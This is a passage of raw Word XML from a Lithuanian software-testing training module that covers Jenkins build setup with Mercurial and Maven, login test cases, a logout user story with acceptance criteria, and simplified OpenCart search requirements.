            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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9200" cy="1656715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Šiuo atveju yra naudojama Mercurial kodo valdymo </w:t>
      </w:r>
      <w:r w:rsidR="000E5A3D" w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>istema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31569287" wp14:editId="614016DD">
            <wp:extent cx="3578225" cy="2305685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="228" name="Paveikslėlis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78225" cy="2305685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005A2E8D" w:rsidRPr="00AD4464">
        <w:t>am, kad mūsų projektas būtų suku</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>riamas, turime pridėti at</w:t>
      </w:r>
      <w:r w:rsidR="005A2E8D" w:rsidRPr="00AD4464">
        <w:t>itinkamą ži</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ngs</w:t>
      </w:r>
      <w:r w:rsidR="005A2E8D" w:rsidRPr="00AD4464">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>į:  “invoke top-level Maven targets”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72BA039C" wp14:editId="65296404">
            <wp:extent cx="3180715" cy="980440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="229" name="Paveikslėlis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180715" cy="980440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kai darbo konfigūravimas yra baigtas, galime jį paleisti, spausdami “Build Now” mygtuką.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Darbo peržiūros langas pateikia tokią informaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1080"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kūrimo (komponavimo) istoriją;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1080"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Darbo vietą failų sistemoje (Workspace)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1080"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vėliausi pakeitimai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1080"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vėliausi testų vykdymo rezultatai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEEE077" wp14:editId="0A262E78">
            <wp:extent cx="4055110" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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55110" cy="2955290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006A0B04" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paspaudę “</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Latest Test Result” galime patikrinti vykdytų testų būseną: trūkmę, ar sėkmingai įvykdyti, kiek nesuvykdytą, kiek nesėkmingų bandymų ir pan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C36FB2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Analizuoti skirtingų tipų reikalavimus, apibūdinančius kompiuterinę programą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D095E" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00820C58">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.1.</w:t>
      </w:r>
      <w:r w:rsidR="005F53FF">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C36FB2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Vykdyti reikalavimų peržiūros procesą naudojant vartotojo pasakojimo reikalavimų programinei įrangai formatą.</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C36FB2" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> REIKALAVIMŲ POGRAMINEI ĮRANGAI FORMATAI</w:t>
      </w:r>
      <w:r w:rsidR="0007577E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reikalavimas yra apibrėžtas kaip specifikacija. Panaudojimo atvejis šios specifikacijos yra pateikiamas atskirai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reikalavimui ištestuoti gali būti naudojami šie testavimo atvejai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prisijungti prie sistemos nurodant neteisingą slaptažodį slaptažodį -&gt; gaunamas klaidos pranešimas, vartotojas neprijungiamas prie sistemos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prisijungti prie sistemos nurodant neteisingą slaptažodį, pakartoti kelis kartus, patikrinti, ar paskyra blokuojama;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Patikrinti, ar yra galimybė atblokuoti paskyrą atstatant slaptažodį (kokiu būdu atblokavimas vyksta, nenurodyta reikalavime);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Patikrinti visus vartotojo registravimo formos įvedimo laukus (formatus, ilgius, būtinumo pažymį);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prisijungti prie sistemos su neregistruotu vartotoju -&gt; gaunamas klaidos pranešimas, vartotojas neprijungiamas prie sistemos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prisijungti prie sistemos su egzistuojančiu vartotoju, suvedant neteisingą slažodį -&gt; gaunamas klaidos pranešimas, vartotojas neprijungiamas prie sistemos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prisijungti prie sistemos su registruotu vartotoju -&gt; atidaromas pagrindinis sistemos langas su priregistravimo kortele;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Registruotam vartotojui pakoreguoti profilio duomenis (kokie konkrečiai duomenys gali būti keičiami nenurodoma):</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4E45B2" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>REIKALAVIMŲ PERŽIŪROS PROCESAS</w:t>
      </w:r>
      <w:r w:rsidR="000474BC">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vartotojo pasakojimas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> Kaip prisiregistrav</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ęs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sistemos vartotojas noriu i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>šsiregistruoti iš sistemos paspausdamas mygtuką „Atsijungti“, nepriklausomai nuo to, kokį darbą su sistema būčiau dirbęs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimo paruošimo kriterijai:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> vartotojo pasakojimas yra apibrėžtas aiškiai, yra aiškus ir vienareikšmiškai suvokiamas konktekstas. Priėmimo kriterijai yra aiškūs, testuotini.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Priėmimo kriterijų pavyzdžiai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsijungimo nuo sistemos mygtukas rodomas tik prisijungusiems vartotojams;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paspaudus “Atsijungti” mygtuką, Sistema atjungia vartotoją, uždaro jo pradėtus darbus ir atvaizduoja pradinį puslapį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Jei vartotojas atsijungia nuo sistemos nepabaigęs kokio nors darbo, jo pradėti, bet nepabaigti darbai nėra išsaugomi, juos reikės atlikti iš naujo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsijungęs vartotojas vėl mato “Prisijungti” mygtuką ir gali registruotis vėl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojas gali atsijungti nuo sistemos nepriklausomai nuo to, kokiame sistemos lange jis yra</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000076FD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="00815BD3">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E45B2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Naudoti funkcinius, nefunkcinius ir techninius kompiuterinės programos reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004E45B2" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>FUNKCINIAI REIKALAVIMAI</w:t>
      </w:r>
      <w:r w:rsidR="00815BD3">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Opencart – Paieška (supaprastinti paieškos funkcionalumo reikalavimai)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei į paieškos lauką įvedamas produkto tikslus pavadinimas ir spaudži</w:t>
      </w:r>
      <w:r w:rsidR="003C7A53" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>amas "Paieška" my</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>gtukas, sistema pateikia sąrašą v</w:t>
      </w:r>
      <w:r w:rsidR="003C7A53" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>isų šio produkto atmainų, turimų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pardavime. OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- jei įvedamas raktažodis pagal produkto kategor</w:t>
      </w:r>
      <w:r w:rsidR="003C7A53" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>iją ir spaudžiamas "Paieška" my</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">gtukas, sistema pateikia sarašą produktų atitinkamos kategorijos; NOK. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
